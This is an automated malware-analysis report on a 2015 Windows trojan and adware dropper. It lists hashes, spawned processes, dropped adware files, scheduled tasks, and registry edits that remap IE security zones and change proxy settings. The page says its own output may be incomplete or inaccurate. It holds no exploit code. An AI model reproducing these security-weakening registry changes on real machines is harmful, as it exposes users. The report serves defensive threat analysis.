Trojan.Win32.Swrort.3_62c58b2105

by malwarelabrobot on September 9th, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Adware.Zusy.137865 (B) (Emsisoft), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 62c58b2105b362e985abcf714737d58c
SHA1: 54c62022d970cebab554bb681266781af3aab2ae
SHA256: c8d64e1414e1ff696be00794381a75a3997e32516d436028a980fa4f84c13de2
SSDeep: 24576:OdgVl3Ghux6I20BL9J3HGzSFqOPwnMhAJi9 EkqL3YLqSQ7LpIC0T1Q4AjTtLXt5:JGIcI7pHGowoBsNRQ7LpaC5PtLXtUyIE
Size: 1448960 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-08-30 11:35:44
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

BrowserHelper.exe:3852
net1.exe:308
net1.exe:3640
Xfunhej.exe:3632
ping.exe:2088
ping.exe:2548
ping.exe:2312
ping.exe:3196
ping.exe:3620
ping.exe:4068
ping.exe:4076
ping.exe:968
ping.exe:2700
ping.exe:3684
ping.exe:3400
ping.exe:3524
ping.exe:2704
ping.exe:2300
ping.exe:2972
ping.exe:3148
ping.exe:2236
ping.exe:2976
ns19.tmp:2004
8e4b80.exe:3080
ins_sense.exe:2532
Rpuxtvuh.exe:3544
find.exe:2064
sc.exe:3412
sc.exe:3732
sc.exe:4016
net.exe:4004
net.exe:3552
setup.exe:2172
setup.exe:3240
tcpsvcs.exe:2420
ins_geforce.exe:2480
ShopperPro.exe:2216
ins_shopperpro.exe:2144
regsvr32.exe:2320
BROWSE~2.EXE:3752
%original file name%.exe:344
%original file name%.exe:1304
%original file name%.exe:2080
%original file name%.exe:2228
%original file name%.exe:2300
7.exe:3088

The Trojan injects its code into the following process(es):

YTDownloader.exe:2364

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Xfunhej.exe:3632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ipgeoapi[1] (40 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\bbgywhu.dll (3616 bytes)
%WinDir%\Tasks\aaca3934-a6c1-440e-8ac5-21234d851fa1-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\qguetosqu.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse17.tmp (527882 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\203909 (39178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\ntwbv.dll (29608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\yztwcnvph.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\idnfrnuqa.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\110365 (7838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\icvfyg.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\vezhey.dll (6 bytes)
%Program Files%\Sense\aaca3934-a6c1-440e-8ac5-21234d851fa1-5.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp (4 bytes)
%Program Files%\Sense\utils.exe (67132 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\idnfrnuqa.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\bbgywhu.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\qguetosqu.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\203909 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\ntwbv.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\yztwcnvph.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\icvfyg.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\110365 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\vezhey.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp (0 bytes)

The process 8e4b80.exe:3080 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\tglpj.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_e (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_d (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_c (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_b (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_a (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\Sjikjrpjwjyg.tmp (331151 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\Rpuxtvuh.exe (1310642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\gtkafj.dll (2059 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\jbgkkfakd.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\15270.bat (407 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\tglpj.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\Sjikjrpjwjyg.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\Rpuxtvuh.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\gtkafj.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\jbgkkfakd.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp (0 bytes)

The process ins_sense.exe:2532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The process Rpuxtvuh.exe:3544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\30787 (36879 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (557785 bytes)
%Program Files%\Ge-Force\f5963046-cdb9-419e-b034-e988d89c98b9-5.exe (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\jbgkkfakd.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\sevlj.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\vfeefowv.dll (3616 bytes)
%WinDir%\Tasks\f5963046-cdb9-419e-b034-e988d89c98b9-5.job (72 bytes)
%Program Files%\Ge-Force\utils.exe (56390 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\vmtixlgd.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\suobscxd.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\335307 (6204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\tglpj.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\tvhjdcrog.dll (30464 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\30787 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ipgeoapi[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\jbgkkfakd.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\sevlj.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\vfeefowv.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\vmtixlgd.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\suobscxd.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\335307 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\tglpj.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\tvhjdcrog.dll (0 bytes)

The process setup.exe:2172 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (159542 bytes)
%Program Files%\ShopperPro\Updater.exe (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\MoreInfo.dll (7 bytes)
%Program Files%\ShopperPro\manifest.json (595 bytes)
%Program Files%\ShopperPro\database1_0_0.json (4 bytes)
%Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
%Program Files%\ShopperPro\SPRemove.exe (20416 bytes)
%Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsExec.dll (6 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\ShopperPro64.dll (18424 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
%Program Files%\ShopperPro\ShopperPro.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.js (13 bytes)
%Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsProcess.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\ns8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\AccDownload.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (11 bytes)
%Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
%WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)
%Program Files%\ShopperPro\database1_0_0.ej (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\jsdrv.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\ns8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\MoreInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\AccDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsExec.dll (0 bytes)

The process setup.exe:3240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\YTDownloader\libeay32.dll (25608 bytes)
%WinDir%\Tasks\YTDownloader.job (942 bytes)
%Program Files%\YTDownloader\rtmpdump.exe (14285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\nsProcess.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\AccDownload.dll (9226 bytes)
%Program Files%\YTDownloader\YTDownloader.exe (44363 bytes)
%Program Files%\YTDownloader\DownloadAPI.dll (47585 bytes)
%Program Files%\YTDownloader\Unelevate.exe (2753 bytes)
%Program Files%\YTDownloader\BrowserHelper.exe (11050 bytes)
%Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
%Program Files%\YTDownloader\BrowserHelperSrv.exe (4233 bytes)
%Program Files%\YTDownloader\Updater.exe (17892 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\System.dll (11 bytes)
%Program Files%\YTDownloader\download_ani.gif (9 bytes)
%Program Files%\YTDownloader\DownloadHelper.exe (10788 bytes)
%Program Files%\YTDownloader\AniGIF.ocx (5635 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\ssleay32.dll (4079 bytes)
%Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\sbmntr.sys (28 bytes)
%Program Files%\Common Files\System\SysMenu.dll (16245 bytes)
%Program Files%\YTDownloader\YTDUninstall.exe (20245 bytes)
%Program Files%\YTDownloader\Download_completed.ico (1 bytes)
%Program Files%\YTDownloader\convert_ani.gif (765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp (4 bytes)
%Program Files%\YTDownloader\converter.exe (61456 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\nsExec.dll (6 bytes)
%WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\AccDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\nsExec.dll (0 bytes)

The process tcpsvcs.exe:2420 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp\setup.exe (2555480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseA.tmp (242805 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp\setup1.exe (229796 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp\setup1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp\NK.lky (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp\D1958.dll (0 bytes)

The process ins_geforce.exe:2480 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The process ShopperPro.exe:2216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\ShopperPro.job (2150 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3361 bytes)
%Program Files%\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.ej (6 bytes)

The process ins_shopperpro.exe:2144 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp\setup1.exe (79085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp\setup.exe (869966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp (86140 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp\NK.lky (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp\setup1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp\D1958.dll (0 bytes)

The process %original file name%.exe:344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Install_11820\ins_shopperpro.exe (31085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Installer\Install_3245\%original file name%.exe (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_11820\ins_geforce.exe (1505 bytes)
%WinDir%\Tasks\Inst_Rep.job (720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_11820\bxsdk32.dll (2386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_11820\ins_sense.exe (1509 bytes)

The process 7.exe:3088 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\bkulignxu.dll (2021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\yztwcnvph.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_e (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_d (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\qguetosqu.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_a (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_c (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_b (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\Xfunhej.exe (1309931 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\Taldus.tmp (329705 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\15270.bat (407 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\yztwcnvph.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\bkulignxu.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\qguetosqu.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\Xfunhej.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\Taldus.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\utility[1].gif (0 bytes)

Registry activity

The process BrowserHelper.exe:3852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 17 AC D3 39 61 55 5D 89 D4 79 61 18 98 02 E4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

The process net1.exe:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process net1.exe:3640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process Xfunhej.exe:3632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrPublisherId" = "20891"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrAppId" = "70299"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Crossrider]
"Verifier" = "67a1823aa892cacdb48c5c33d8b81ea2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
"70299" = "Sense"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"UninstallString" = "%Program Files%\Sense\Uninstall.exe /fcp=1"

[HKLM\SOFTWARE\Crossrider]
"Bic" = "03a471124f01b8b4a21fa91e866e62edIE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayName" = "Sense"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Crossrider]
"Bic" = "03a471124f01b8b4a21fa91e866e62edIE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 0F 50 00 2F 0D C9 D5 F0 53 38 54 1E FA F3 F7"

[HKLM\SOFTWARE\Crossrider]
"Verifier" = "67a1823aa892cacdb48c5c33d8b81ea2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\InstalledBrowserExtensions\20891]
"70299" = "Sense"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayIcon" = "%Program Files%\Sense\utils.exe"

[HKCU\Software\InstalledBrowserExtensions\Sense ]
"70299" = "Sense"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"Publisher" = "Sense "

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayVersion" = "1.36.01.22"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

